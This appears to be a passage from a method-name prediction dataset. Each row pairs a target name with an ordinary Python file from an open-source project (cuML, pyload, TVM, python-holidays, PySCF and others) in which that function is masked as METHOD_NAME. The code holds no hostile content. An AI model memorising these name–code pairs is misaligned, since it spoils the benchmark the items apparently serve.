self.list_data.append((str(i+1),i,"[ ] CH#{}".format(i+1)))
super().fill_list()
def fill_listbox(self):
super().fill_listbox()
#if self.mode=='CLONE':
# self.highlight_cloned()
# Highlight the channels that the current channel is cloned to ...
def highlight_cloned(self):
i=0
for item in self.list_data:
if item[2][:2]=='[x':
self.listbox.itemconfig(i, {'fg':zynthian_gui_config.color_hl})
else:
self.listbox.itemconfig(i, {'fg':zynthian_gui_config.color_panel_tx})
i += 1
def get_midi_chan_index(self, chan):
for i,ch in enumerate(self.chan_list):
if ch==chan:
return i
def select_action(self, i, t='S'):
selchan = self.list_data[i][1]
self.midi_chan_sel = selchan
if self.mode=='ADD':
self.zyngui.screens['layer'].add_layer_midich(selchan)
elif self.mode=='SET':
root_layer = self.zyngui.screens['layer_options'].layer
sublayers = self.zyngui.screens['layer'].get_fxchain_layers(root_layer) + self.zyngui.screens['layer'].get_midichain_layers(root_layer)
root_layer.set_midi_chan(selchan)
for layer in sublayers:
layer.set_midi_chan(selchan)
logging.info("LAYER {} -> MIDI CHANNEL = {}".format(layer.get_path(), selchan))
self.zyngui.zynautoconnect_midi()
self.zyngui.screens['audio_mixer'].refresh_visible_strips()
self.zyngui.set_active_channel()
self.zyngui.close_screen()
elif self.mode=='CLONE':
if selchan!=self.midi_chan:
if t=='S':
if lib_zyncore.get_midi_filter_clone(self.midi_chan, selchan):
lib_zyncore.set_midi_filter_clone(self.midi_chan, selchan, 0)
else:
lib_zyncore.set_midi_filter_clone(self.midi_chan, selchan, 1)
self.update_list()
logging.info("CLONE MIDI CHANNEL {} => {}".format(self.midi_chan, selchan))
elif t=='B':
self.clone_config_cc()
def clone_config_cc(self):
self.zyngui.screens['midi_cc'].config(self.midi_chan, self.midi_chan_sel)
self.zyngui.show_screen('midi_cc')
def midi_chan_activity(self, chan):
if self.shown and self.mode!='CLONE' and not zynthian_gui_config.midi_single_active_channel and not self.zyngui.zynseq.libseq.transportGetPlayStatus():
i = self.get_midi_chan_index(chan)
if i is not None and i!=self.index:
dts = (datetime.now()-self.last_index_change_ts).total_seconds()
selchan = self.list_data[self.index][1]
if (selchan==self.midi_chan_act and dts>0.2) or dts>2:
self.midi_chan_act = chan
self.select(i)
def METHOD_NAME(self):
if self.mode=='ADD' or self.mode=='SET':
self.select_path.set("MIDI Channel")
elif self.mode=='CLONE':
self.select_path.set("Clone MIDI Channel {} to ...".format(self.midi_chan+1))
#------------------------------------------------------------------------------ | null |
arr to similarity mat | # Copyright (c) 2020-2023, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cuml.common.exceptions import NotFittedError
import pytest
from cuml.internals.safe_imports import cpu_only_import
import cuml
from cuml.dask.preprocessing.LabelEncoder import LabelEncoder
from cuml.internals.safe_imports import gpu_only_import
cudf = gpu_only_import("cudf")
np = cpu_only_import("numpy")
dask_cudf = gpu_only_import("dask_cudf")
cp = gpu_only_import("cupy")
def METHOD_NAME(arr):
arr = arr.reshape(1, -1)
return np.pad(arr, [(arr.shape[1] - 1, 0), (0, 0)], "edge")
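# The helper above tiles a 1-D array into a square matrix whose rows all equal
# the input, so that (mat == mat.T) is the pairwise-equality matrix of the
# original labels. Illustrative example: np.array([1, 2, 1]) becomes
# [[1, 2, 1], [1, 2, 1], [1, 2, 1]].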
@pytest.mark.parametrize("length", [10, 1000])
@pytest.mark.parametrize("cardinality", [5, 10, 50])
def test_labelencoder_fit_transform(length, cardinality, client):
"""Try encoding the entire df"""
tmp = cudf.Series(np.random.choice(cardinality, (length,)))
df = dask_cudf.from_cudf(tmp, npartitions=len(client.has_what()))
encoded = cuml.dask.preprocessing.LabelEncoder().fit_transform(df)
df_arr = df.compute().to_numpy()
df_arr = METHOD_NAME(df_arr)
encoder_arr = cp.asnumpy(encoded.compute().to_numpy())
encoded_arr = METHOD_NAME(encoder_arr)
assert ((encoded_arr == encoded_arr.T) == (df_arr == df_arr.T)).all()
@pytest.mark.parametrize("length", [10, 100, 1000])
@pytest.mark.parametrize("cardinality", [5, 10, 50])
def test_labelencoder_transform(length, cardinality, client):
"""Try fitting and then encoding a small subset of the df"""
tmp = cudf.Series(np.random.choice(cardinality, (length,)))
df = dask_cudf.from_cudf(tmp, npartitions=len(client.has_what()))
le = LabelEncoder().fit(df)
assert le._fitted
encoded = le.transform(df)
df_arr = df.compute().to_numpy()
df_arr = METHOD_NAME(df_arr)
encoder_arr = cp.asnumpy(encoded.compute().to_numpy())
encoded_arr = METHOD_NAME(encoder_arr)
assert ((encoded_arr == encoded_arr.T) == (df_arr == df_arr.T)).all()
def test_labelencoder_unseen(client):
"""Try encoding a value that was not present during fitting"""
df = dask_cudf.from_cudf(
cudf.Series(np.random.choice(10, (10,))),
npartitions=len(client.has_what()),
)
le = LabelEncoder().fit(df)
assert le._fitted
with pytest.raises(KeyError):
tmp = dask_cudf.from_cudf(
cudf.Series([-100, -120]), npartitions=len(client.has_what())
)
le.transform(tmp).compute()
def test_labelencoder_unfitted(client):
"""Try calling `.transform()` without fitting first"""
df = dask_cudf.from_cudf(
cudf.Series(np.random.choice(10, (10,))),
npartitions=len(client.has_what()),
)
le = LabelEncoder()
with pytest.raises(NotFittedError):
le.transform(df).compute()
@pytest.mark.parametrize("use_fit_transform", [False, True])
@pytest.mark.parametrize(
"orig_label, ord_label, expected_reverted, bad_ord_label",
[
(
cudf.Series(["a", "b", "c"]),
cudf.Series([2, 1, 2, 0]),
cudf.Series(["c", "b", "c", "a"]),
cudf.Series([-1, 1, 2, 0]),
),
(
cudf.Series(["Tokyo", "Paris", "Austin"]),
cudf.Series([0, 2, 0]),
cudf.Series(["Austin", "Tokyo", "Austin"]),
cudf.Series([0, 1, 2, 3]),
),
(
cudf.Series(["a", "b", "c1"]),
cudf.Series([2, 1]),
cudf.Series(["c1", "b"]),
cudf.Series([0, 1, 2, 3]),
),
(
cudf.Series(["1.09", "0.09", ".09", "09"]),
cudf.Series([0, 1, 2, 3]),
cudf.Series([".09", "0.09", "09", "1.09"]),
cudf.Series([0, 1, 2, 3, 4]),
),
],
)
def test_inverse_transform(
orig_label,
ord_label,
expected_reverted,
bad_ord_label,
use_fit_transform,
client,
):
n_workers = len(client.has_what())
orig_label = dask_cudf.from_cudf(orig_label, npartitions=n_workers)
ord_label = dask_cudf.from_cudf(ord_label, npartitions=n_workers)
expected_reverted = dask_cudf.from_cudf(
expected_reverted, npartitions=n_workers
)
bad_ord_label = dask_cudf.from_cudf(bad_ord_label, npartitions=n_workers)
# prepare LabelEncoder
le = LabelEncoder()
if use_fit_transform:
le.fit_transform(orig_label)
else:
le.fit(orig_label)
assert le._fitted is True
# test if inverse_transform is correct
reverted = le.inverse_transform(ord_label)
reverted = reverted.compute().reset_index(drop=True)
expected_reverted = expected_reverted.compute()
assert len(reverted) == len(expected_reverted)
assert len(reverted) == len(reverted[reverted == expected_reverted])
# test if correctly raies ValueError
with pytest.raises(ValueError, match="y contains previously unseen label"):
le.inverse_transform(bad_ord_label).compute()
def test_unfitted_inverse_transform(client):
"""Try calling `.inverse_transform()` without fitting first"""
tmp = cudf.Series(np.random.choice(10, (10,)))
df = dask_cudf.from_cudf(tmp, npartitions=len(client.has_what()))
le = LabelEncoder()
with pytest.raises(NotFittedError):
le.transform(df)
@pytest.mark.parametrize(
"empty, ord_label", [(cudf.Series([]), cudf.Series([2, 1]))]
)
def test_empty_input(empty, ord_label, client):
# prepare LabelEncoder
n_workers = len(client.has_what())
empty = dask_cudf.from_cudf(empty, npartitions=n_workers)
ord_label = dask_cudf.from_cudf(ord_label, npartitions=n_workers)
le = LabelEncoder()
le.fit(empty)
assert le._fitted is True
# test if it correctly raises ValueError
with pytest.raises(ValueError, match="y contains previously unseen label"):
le.inverse_transform(ord_label).compute()
# check fit_transform()
le = LabelEncoder()
transformed = le.fit_transform(empty).compute()
assert le._fitted is True
assert len(transformed) == 0
def test_masked_encode(client):
n_workers = len(client.has_what())
df = cudf.DataFrame(
{
"filter_col": [1, 1, 2, 3, 1, 1, 1, 1, 6, 5],
"cat_col": ["a", "b", "c", "d", "a", "a", "a", "c", "b", "c"],
}
)
ddf = dask_cudf.from_cudf(df, npartitions=n_workers)
ddf_filter = ddf[ddf["filter_col"] == 1]
filter_encoded = LabelEncoder().fit_transform(ddf_filter["cat_col"])
ddf_filter = ddf_filter.assign(filter_encoded=filter_encoded.values)
encoded_filter = LabelEncoder().fit_transform(ddf["cat_col"])
ddf = ddf.assign(encoded_filter=encoded_filter.values)
ddf = ddf[ddf.filter_col == 1]
assert (ddf.encoded_filter == ddf_filter.filter_encoded).compute().all() | null |
current theme id | # -*- coding: utf-8 -*-
import json
from functools import wraps
from urllib.parse import unquote, urljoin, urlparse
import flask
import flask_themes2
from pyload.core.api import Perms, Role, has_permission
class JSONEncoder(json.JSONEncoder):
def default(self, obj):
try:
return dict(obj)
except TypeError:
pass
return super().default(obj)
try:
JSONProviderBase = flask.json.provider.JSONProvider
except AttributeError:
pass
else:
class JSONProvider(JSONProviderBase):
def dumps(self, obj, **kwargs):
return json.dumps(obj, **kwargs, cls=JSONEncoder)
def loads(self, s, **kwargs):
return json.loads(s, **kwargs)
#: Checks if location belongs to same host address
def is_safe_url(location):
ref_url = urlparse(flask.request.host_url)
test_url = urlparse(urljoin(flask.request.host_url, location))
return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc
def get_redirect_url(fallback=None):
login_url = urljoin(flask.request.url_root, flask.url_for('app.login'))
request_url = unquote(flask.request.url)
for location in flask.request.values.get("next"), flask.request.referrer:
if not location:
continue
if location in (request_url, login_url): # don't redirect to same location
continue
if is_safe_url(location):
return location
return fallback
def render_base(messages):
return render_template("base.html", messages=messages)
def clear_session(session=flask.session, permanent=True):
session.permanent = bool(permanent)
session.clear()
# session.modified = True
def METHOD_NAME():
api = flask.current_app.config["PYLOAD_API"]
return api.get_config_value("webui", "theme").lower()
#: tries to serve the file from the static directory of the current theme otherwise fallback to builtin one
def static_file_url(filename):
themeid = METHOD_NAME()
try:
url = flask_themes2.static_file_url(themeid, filename)
except KeyError:
url = flask.url_for("static", filename=filename)
return url
def theme_template(filename):
return flask.url_for("app.render", filename=filename)
#: tries to render the template of the current theme otherwise fallback to builtin template
def render_template(template, **context):
themeid = METHOD_NAME()
return flask_themes2.render_theme_template(themeid, template, **context)
def parse_permissions(session=flask.session):
perms = {x.name: False for x in Perms}
perms["ADMIN"] = False
perms["is_admin"] = False
if not session.get("authenticated", False):
return perms
perms["ANY"] = True
if session.get("role") == Role.ADMIN:
for key in perms.keys():
perms[key] = True
elif session.get("perms"):
p = session.get("perms")
perms.update(get_permission(p))
return perms
def permlist():
return [x.name for x in Perms if x.name != "ANY"]
def get_permission(userperms):
"""
Returns a dict with a boolean value for each permission name.
:param userperms: permission bits
"""
return {
name: has_permission(userperms, getattr(Perms, name).value)
for name in permlist()
}
def set_permission(perms):
"""
Generates permission bits from a dictionary of permission flags.
:param perms: dict
"""
permission = 0
for name in permlist():
if name.startswith("_"):
continue
if name in perms and perms[name]:
permission |= getattr(Perms, name)
return permission
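# Illustrative round trip (assuming each Perms member is a distinct bit flag):
# set_permission({name: True}) for a single permission name returns an int with
# only that bit set, and get_permission() of that value maps the same name back
# to True while all other names stay False.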
def set_session(user_info, session=flask.session, permanent=True):
session.permanent = bool(permanent)
session.update(
{
"authenticated": True,
"id": user_info["id"],
"name": user_info["name"],
"role": user_info["role"],
"perms": user_info["permission"],
"template": user_info["template"],
}
)
# session.modified = True
return session
# TODO: Recheck...
def parse_userdata(session=flask.session):
return {
"name": session.get("name", "Anonymous"),
"is_admin": session.get("role", 1) == 0,
"is_authenticated": session.get("authenticated", False),
}
def apiver_check(func):
# if no apiver is provided assumes latest
@wraps(func)
def wrapper(*args, **kwargs):
api = flask.current_app.config["PYLOAD_API"]
core_apiver = api.__version__
if int(kwargs.get("apiver", core_apiver).strip("v")) < core_apiver:
return "Obsolete API", 404
return func(*args, **kwargs)
return wrapper
def is_authenticated(session=flask.session):
api = flask.current_app.config["PYLOAD_API"]
user = session.get("name")
authenticated = session.get("authenticated")
return authenticated and api.user_exists(user)
def login_required(perm):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
s = flask.session
#: already authenticated?
if is_authenticated(s):
perms = parse_permissions(s)
if perm not in perms or not perms[perm]:
response = "Forbidden", 403
else:
response = func(*args, **kwargs)
else:
clear_session(s)
if flask.request.headers.get("X-Requested-With") == "XMLHttpRequest":
response = "Forbidden", 403
else:
location = flask.url_for(
"app.login",
next=flask.request.url
)
response = flask.redirect(location)
return response
return wrapper
return decorator | null |
build conv2d | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Test conv2d HVX intrinsic implementation"""
import numpy as np
import tvm
import tvm.contrib.hexagon
from tvm.topi.testing import conv2d_nhwc_python
from ..infrastructure import get_hexagon_target
def METHOD_NAME(target):
"""Build and the return the conv2d module that calls the intrinsic implementation"""
act_n, act_h, act_w, act_c = (
tvm.te.var("act_n"),
tvm.te.var("act_h"),
tvm.te.var("act_w"),
tvm.te.var("act_c"),
)
filt_h, filt_w, filt_o = tvm.te.var("filt_h"), tvm.te.var("fw"), tvm.te.var("filt_o")
off_l, off_t = tvm.te.var("off_l"), tvm.te.var("off_t")
stride_h, stride_w = tvm.te.var("stride_h"), tvm.te.var("stride_w")
act_flat = tvm.te.placeholder(
shape=(act_n, act_h, act_w, act_c), dtype="float16", name="act_flat"
)
wgt_flat = tvm.te.placeholder(
shape=(filt_h, filt_w, act_c, filt_o), dtype="float16", name="wgt_flat"
)
out_flat = tvm.te.extern(
shape=(act_n, (act_h - filt_h) // stride_h + 1, (act_w - filt_w) // stride_w + 1, filt_o),
inputs=[act_flat, wgt_flat],
fcompute=lambda ins, outs: tvm.tir.call_cpacked(
"conv2d_packed_fp16", # Function from TVM runtime
ins[0],
ins[1],
off_t,
off_l,
stride_h,
stride_w,
outs[0],
tvm.runtime.const(0), # resource_handle (unused)
),
dtype="float16",
)
s = tvm.te.create_schedule(out_flat.op)
func_name = "extern_conv"
with tvm.transform.PassContext(opt_level=3):
module = tvm.build(
s,
[act_flat, wgt_flat, off_t, off_l, stride_h, stride_w, out_flat],
target=target,
name=func_name,
)
return module
def gen_config(params):
"""Utility function to generate useful ids for shape_parameters"""
dims = lambda vals: "x".join(map(str, vals))
config = {}
for param in params:
act_shape, wgt_shape, inp_stride = param
name = f"nhwc{dims(act_shape)}-hwio{dims(wgt_shape)}-stride{dims(inp_stride)}"
config[name] = param
return config
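# Illustrative id produced by gen_config: the parameter
# ((1, 8, 4, 3), (3, 3, 3, 3), (1, 1)) maps to the key
# "nhwc1x8x4x3-hwio3x3x3x3-stride1x1".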
class TestConv2dIntrin:
"""Test Conv2d Intrin class"""
shape_parameters = [
(
(1, 8, 4, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 10, 14, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 14, 6, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 14, 6, 3),
(3, 3, 3, 64),
(1, 1),
),
(
(1, 14, 6, 3),
(5, 5, 3, 3),
(1, 1),
),
(
(1, 8, 8, 3),
(2, 2, 3, 3),
(1, 1),
),
(
(1, 14, 6, 64),
(3, 3, 64, 3),
(1, 1),
),
(
(1, 4, 4, 40),
(3, 3, 40, 3),
(1, 1),
),
(
(1, 4, 4, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 5, 5, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 6, 6, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 7, 7, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 8, 8, 3),
(3, 3, 3, 3),
(1, 1),
),
(
(1, 8, 8, 3),
(5, 5, 3, 3),
(1, 1),
),
(
(1, 8, 8, 64),
(2, 2, 64, 64),
(1, 1),
),
(
(1, 8, 4, 3),
(3, 3, 3, 3),
(2, 2),
),
(
(1, 14, 6, 3),
(3, 3, 3, 64),
(2, 2),
),
(
(1, 14, 6, 3),
(5, 5, 3, 3),
(2, 2),
),
(
(1, 8, 8, 3),
(2, 2, 3, 3),
(2, 2),
),
]
config = gen_config(shape_parameters)
act_shape, wgt_shape, inp_stride = tvm.testing.parameters(*config.values(), ids=config.keys())
inp_offset = tvm.testing.parameter((0, 0), ids=["offset0x0"])
@tvm.testing.requires_hexagon
def test_conv2d(self, act_shape, wgt_shape, inp_stride, inp_offset, hexagon_session):
"""Test conv2d intrinsic implementation"""
assert act_shape[3] == wgt_shape[2]
# Currently, input offset does not affect the output shape
def get_out_shape(ash, wsh, inp_stride):
assert ash[3] == wsh[2]
osh = (
ash[0],
(ash[1] - wsh[0]) // inp_stride[0] + 1,
(ash[2] - wsh[1]) // inp_stride[1] + 1,
wsh[3],
)
assert tvm.tir.all([x > 0 for x in osh])
return osh
act = np.random.rand(*act_shape).astype("float16")
wgt = np.random.rand(*wgt_shape).astype("float16")
module = METHOD_NAME(get_hexagon_target("v68"))
mod = hexagon_session.load_module(module)
output = tvm.nd.array(
np.zeros(get_out_shape(act_shape, wgt_shape, inp_stride), dtype="float16"),
device=hexagon_session.device,
)
mod(
tvm.nd.array(act, device=hexagon_session.device),
tvm.nd.array(wgt, device=hexagon_session.device),
inp_offset[0], # off_t
inp_offset[1], # off_l
inp_stride[0], # stride_height
inp_stride[1], # stride_width
output,
)
out = output.numpy()
# Generate reference output and compare:
ref_out = conv2d_nhwc_python(
act.astype("float32"), wgt.astype("float32"), stride=inp_stride, padding="VALID"
).astype("float16")
tvm.testing.assert_allclose(out, ref_out, rtol=5e-2, atol=5e-2)
if __name__ == "__main__":
tvm.testing.main() | null |
test l10n uk | # python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Authors: dr-prodigy <[email protected]> (c) 2017-2023
# ryanss <[email protected]> (c) 2014-2017
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from holidays.countries.slovenia import Slovenia, SI, SVN
from tests.common import TestCase
class TestSlovenia(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass(Slovenia, years=range(1991, 2050))
def test_country_aliases(self):
self.assertCountryAliases(Slovenia, SI, SVN)
def test_no_holidays(self):
self.assertNoHolidays(Slovenia(years=1990))
def test_special_holidays(self):
self.assertHoliday(
# Solidarity Day
"2023-08-14",
)
def test_new_years_day(self):
name = "novo leto"
self.assertHolidayName(name, (f"{year}-01-01" for year in range(1991, 2050)))
self.assertHolidayName(name, (f"{year}-01-02" for year in range(1991, 2013)))
self.assertHolidayName(name, (f"{year}-01-02" for year in range(2017, 2050)))
self.assertNoHoliday(f"{year}-01-02" for year in range(2013, 2017))
def test_preserens_day(self):
self.assertHolidayName("Prešernov dan", (f"{year}-02-08" for year in range(1991, 2050)))
def test_easter_monday(self):
self.assertHolidayName(
"Velikonočni ponedeljek",
"2019-04-22",
"2020-04-13",
"2021-04-05",
"2022-04-18",
"2023-04-10",
)
def test_uprising_against_occupation_day(self):
self.assertHolidayName(
"dan upora proti okupatorju", (f"{year}-04-27" for year in range(1991, 2050))
)
def test_labor_day(self):
self.assertHolidayName("praznik dela", (f"{year}-05-01" for year in range(1991, 2050)))
self.assertHolidayName("praznik dela", (f"{year}-05-02" for year in range(1991, 2050)))
def test_statehood_day(self):
self.assertHolidayName("dan državnosti", (f"{year}-06-25" for year in range(1991, 2050)))
def test_assumption_day(self):
self.assertHolidayName(
"Marijino vnebovzetje", (f"{year}-08-15" for year in range(1991, 2050))
)
def test_reformation_day(self):
name = "dan reformacije"
self.assertHolidayName(name, (f"{year}-10-31" for year in range(1992, 2050)))
self.assertNoHoliday("1991-10-31")
self.assertNoHolidayName(name, 1991)
def test_all_saints_day(self):
self.assertHolidayName(
"dan spomina na mrtve", (f"{year}-11-01" for year in range(1991, 2050))
)
def test_christmas_day(self):
self.assertHolidayName("Božič", (f"{year}-12-25" for year in range(1991, 2050)))
def test_independence_and_unity_day(self):
self.assertHolidayName(
"dan samostojnosti in enotnosti", (f"{year}-12-26" for year in range(1991, 2050))
)
def test_l10n_default(self):
self.assertLocalizedHolidays(
("2022-01-01", "novo leto"),
("2022-01-02", "novo leto"),
("2022-02-08", "Prešernov dan"),
("2022-04-18", "Velikonočni ponedeljek"),
("2022-04-27", "dan upora proti okupatorju"),
("2022-05-01", "praznik dela"),
("2022-05-02", "praznik dela"),
("2022-06-25", "dan državnosti"),
("2022-08-15", "Marijino vnebovzetje"),
("2022-10-31", "dan reformacije"),
("2022-11-01", "dan spomina na mrtve"),
("2022-12-25", "Božič"),
("2022-12-26", "dan samostojnosti in enotnosti"),
)
def test_l10n_en_us(self):
self.assertLocalizedHolidays(
"en_US",
("2022-01-01", "New Year's Day"),
("2022-01-02", "New Year's Day"),
("2022-02-08", "Preseren's Day"),
("2022-04-18", "Easter Monday"),
("2022-04-27", "Day of Uprising Against Occupation"),
("2022-05-01", "Labor Day"),
("2022-05-02", "Labor Day"),
("2022-06-25", "Statehood Day"),
("2022-08-15", "Assumption Day"),
("2022-10-31", "Reformation Day"),
("2022-11-01", "Remembrance Day"),
("2022-12-25", "Christmas Day"),
("2022-12-26", "Independence and Unity Day"),
)
def METHOD_NAME(self):
self.assertLocalizedHolidays(
"uk",
("2022-01-01", "Новий рік"),
("2022-01-02", "Новий рік"),
("2022-02-08", "День Прешерена"),
("2022-04-18", "Великодній понеділок"),
("2022-04-27", "День спротиву окупантам"),
("2022-05-01", "День праці"),
("2022-05-02", "День праці"),
("2022-06-25", "День державності"),
("2022-08-15", "Внебовзяття Пресвятої Діви Марії"),
("2022-10-31", "День Реформації"),
("2022-11-01", "День памʼяті померлих"),
("2022-12-25", "Різдво Христове"),
("2022-12-26", "День незалежності та єднання"),
) | null |
export sparse model | # MIT License
#
# Copyright (c) 2023 Advanced Micro Devices, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import copy
import torch
from nndct_shared.pruning import logging
from nndct_shared.pruning import errors
from pytorch_nndct.nn.modules.sparse_ops import SparseConv2d, SparseLinear
from pytorch_nndct.pruning import utils
from pytorch_nndct.utils import module_util as mod_util
class SparsePruner(object):
"""Implements Sparse pruning at the module level."""
def __init__(self, model, inputs):
"""Concrete example:
```python
inputs = torch.randn([1, 3, 224, 224], dtype=torch.float32).cuda()
model = MyModel()
sparse_pruner = SparsePruner(model, inputs)
sparse_model = sparse_pruner.sparse_model(w_sparsity=0.5, a_sparsity=0, block_size=16)
```
Arguments:
model (Module): Model to be pruned.
inputs (Tensor, tuple or list): Example inputs used to trace the model.
"""
if isinstance(model, torch.nn.DataParallel):
raise errors.OptimizerDataParallelNotAllowedError(
'DataParallel object is not allowed.')
self._model = model
self._inputs = inputs
self._to_update_dict_list = [] # all module need to replace
self._block_size = 16
self._graph = utils.parse_to_graph(model, inputs)
def sparse_model(self,
w_sparsity=0.5,
a_sparsity=0,
block_size=16,
excludes=None):
assert w_sparsity in [0, 0.5, 0.75]
assert a_sparsity in [0, 0.5]
if a_sparsity == 0:
if w_sparsity not in [0, 0.5, 0.75]:
raise ValueError(
('When a_sparsity is 0, w_sparsity must be in ({})').format(
[0, 0.5, 0.75]))
elif a_sparsity == 0.5:
if w_sparsity != 0.75:
raise ValueError(('When a_sparsity is 0.5, w_sparsity must be 0.75'))
self._block_size = block_size
self.sparse_config = {
'w_sparsity': w_sparsity,
'a_sparsity': a_sparsity,
'block_size': self._block_size
}
logging.info('sparse_config:')
logging.info(self.sparse_config)
if w_sparsity == a_sparsity == 0:
return self._model
logging.info('replace module to sparse module')
# find all nn.Conv2d \ nn.Linear export excluded module
model = copy.deepcopy(self._model)
excluded_nodes = self._get_exclude_nodes(excludes) if excludes else []
# first_conv_nodes, last_conv_nodes = pruning_lib.find_leaf_node(self._graph)
excluded_module_list = []
for excluded_node in list(set(excluded_nodes)):
excluded_module = mod_util.module_name_from_node(excluded_node)
excluded_module_list.append(excluded_module)
for n, m in model.named_modules():
to_update_dict = {}
if isinstance(m, (torch.nn.Conv2d, torch.nn.Linear)):
if n in excluded_module_list:
logging.info('excluded module:')
logging.info(n)
logging.info(m)
elif isinstance(
m, torch.nn.Conv2d) and (m.in_channels / m.groups % 16 != 0 or
m.out_channels % 8 != 0): # for group conv
logging.warn((
'Skipping module ({}) of {} in_channels, {} out_channels, {} groups for sparsity pruning.'
).format(m, m.in_channels, m.out_channels, m.groups))
elif isinstance(m, torch.nn.Linear) and ((m.out_features % 8) != 0 or
(m.in_features % 16) != 0):
logging.warn((
'Skipping module ({}) of {} in_features, {} out_features for sparsity pruning.'
).format(m, m.in_features, m.out_features))
else:
to_update_dict[n] = m
self._to_update_dict_list.append(to_update_dict)
logging.info('replace module list:')
for i in (self._to_update_dict_list):
logging.info(i)
# replace all nn.Conv2d \ nn.Linear and reload ckpt
for idx, to_update_dict in enumerate(self._to_update_dict_list):
for name, sub_module in to_update_dict.items():
if isinstance(sub_module, torch.nn.Conv2d):
sparse_modules = SparseConv2d(
sub_module.in_channels,
sub_module.out_channels,
sub_module.kernel_size,
sub_module.stride,
sub_module.padding,
sub_module.dilation,
sub_module.groups,
bias=True if sub_module.bias is not None else False,
**self.sparse_config)
elif isinstance(sub_module, torch.nn.Linear):
sparse_modules = SparseLinear(
sub_module.in_features,
sub_module.out_features,
bias=True if sub_module.bias is not None else False,
**self.sparse_config)
mod_util.replace_modules(model, name, sparse_modules, copy_ckpt=True)
return model
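# Illustrative flow (mirrors the class docstring; model and inputs are user
# supplied): after sparse training of the model returned by sparse_model(),
# the export method below replaces each SparseConv2d / SparseLinear wrapper
# with a plain nn.Conv2d / nn.Linear, where copy_ckpt=True is taken to carry
# over the trained weights.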
def METHOD_NAME(self, model):
if isinstance(model, (torch.nn.DataParallel, torch.nn.parallel.DataParallel,
torch.nn.parallel.DistributedDataParallel)):
model = model.module
sparse_model = copy.deepcopy(model)
for n, m in model.named_modules():
if isinstance(m, (SparseConv2d, SparseLinear)):
if isinstance(m, SparseConv2d):
nn_modules = torch.nn.Conv2d(
m.conv.in_channels,
m.conv.out_channels,
m.conv.kernel_size,
m.conv.stride,
m.conv.padding,
m.conv.dilation,
m.conv.groups,
bias=True if m.conv.bias is not None else False)
elif isinstance(m, SparseLinear):
nn_modules = torch.nn.Linear(
m.linear.in_features,
m.linear.out_features,
bias=True if m.linear.bias is not None else False)
mod_util.replace_modules(sparse_model, n, nn_modules, copy_ckpt=True)
return sparse_model
def _get_exclude_nodes(self, excludes):
return utils.excluded_node_names(self._model, self._graph, excludes) | null |
tear down module | #!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from functools import reduce
import numpy
from pyscf import gto
from pyscf import scf
from pyscf import ao2mo
from pyscf import mcscf
from pyscf import fci
from pyscf.fci import fci_slow
def setUpModule():
global mol, m, h1e, g2e, ci0, ci1
global norb, nelec
mol = gto.Mole()
mol.verbose = 0
mol.output = None  # "out_h2o"
mol.atom = [
['H', ( 1.,-1. , 0. )],
['H', ( 0.,-1. ,-1. )],
['H', ( 0.,-0.5 ,-0. )],
['H', ( 0.,-0. ,-1. )],
['H', ( 1.,-0.5 , 0. )],
['H', ( 0., 1. , 1. )],
]
mol.basis = {'H': '6-31g'}
mol.build()
m = scf.RHF(mol)
m.conv_tol = 1e-15
m.conv_tol_grad = 1e-7
ehf = m.scf()
norb = m.mo_coeff.shape[1]
nelec = mol.nelectron
h1e = reduce(numpy.dot, (m.mo_coeff.T, m.get_hcore(), m.mo_coeff)).round(9)
